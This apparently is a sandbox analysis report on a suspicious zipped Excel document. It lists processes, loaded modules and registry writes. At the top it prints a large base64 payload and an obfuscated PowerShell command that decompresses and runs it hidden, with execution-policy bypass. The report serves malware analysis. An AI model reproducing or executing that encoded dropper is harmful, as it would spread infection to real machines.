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' ), [SYsTeM.io.coMPReSsIoN.COmPreSsIOnModE]::deCOmPreSS )^| fOReAch-OBjECt{NEw-oBJEct iO.stREAmREADeR( $_,[TexT.eNCoDiNg]::aSCiI )}).readtOEnd() "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
cmD.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3688
CMD
pOwerShEll -exeCutioNp bypASs -nOprOFIle -NOnIntE -WinD hidDEN ${execUTIonCOnteXt}.InvokeCoMmAnd.InVokEsCripT( ${iNput} )
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmD.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\pdh.dll
c:\windows\system32\perfctrs.dll
c:\windows\system32\perfos.dll
c:\windows\system32\perfdisk.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
1778
Read events
1245
Write events
525
Delete events
8

Modification events

PID
Process
Operation
Key
Name
Value
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2912
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\del 23_04_2019 doc. N20203.zip
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface
ShowPassword
1
2912
WinRAR.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1318518801
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\Excel\system
ProcessName
EXCEL.EXE
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\Excel\system
WindowName
Microsoft Excel
2912
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\Excel\system
WindowClassName
XLMAIN
2656
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
2656
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409
2656
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
LocaleName
it-IT
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCalendarType
1
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s1159
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s2359
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTimeFormat
HH:mm:ss
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTime
1
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTLZero
1
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTimePrefix
0
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTime
:
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortDate
dd/MM/yyyy
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDate
1
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDate
/
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLongDate
dddd d MMMM yyyy
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sYearMonth
MMMM yyyy
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCurrency
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrency
2
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegCurr
9
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrDigits
2
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDecimal
,
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonDecimalSep
,
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sThousand
.
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonThousandSep
.
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sList
;
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDigits
2
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iLZero
1
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegNumber
1
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNativeDigits
0123456789
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
NumShape
1
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iMeasure
0
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstDayOfWeek
0
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstWeekOfYear
2
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sGrouping
3;0
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonGrouping
3;0
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sPositiveSign
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNegativeSign
-
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iPaperSize
9
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortTime
HH:mm
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLanguage
ITA
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCountry
Italy
2656
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCountry
39
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5084
Arabic (101)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5053
Bulgarian (Typewriter)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5065
Chinese (Traditional) - US Keyboard
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5031
Czech
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5007
Danish
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5011
German
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5046
Greek
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5000
US
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5020
Spanish
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5009
Finnish
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5010
French
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5083
Hebrew
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5033
Hungarian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5013
Icelandic
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5015
Italian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5061
Japanese
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5063
Korean
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5008
Dutch
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5018
Norwegian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5035
Polish (Programmers)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5003
Portuguese (Brazilian ABNT)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5037
Romanian (Legacy)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5055
Russian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5030
Croatian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5039
Slovak
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5029
Albanian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5022
Swedish
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5079
Thai Kedmanee
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5060
Turkish Q
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5129
Urdu
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5058
Ukrainian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5052
Belarusian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5041
Slovenian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5042
Estonian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5043
Latvian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5045
Lithuanian IBM
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5151
Tajik
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5124
Persian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5118
Vietnamese
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5120
Armenian Eastern
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5117
Azeri Latin
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5163
Sorbian Standard (Legacy)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5109
Macedonian (FYROM)
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5191
Setswana
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5119
Georgian
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5108
Faeroese
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5096
Devanagari - INSCRIPT
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5140
Maltese 47-Key
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5138
Norwegian with Sami
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5113
Kazakh
2656
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
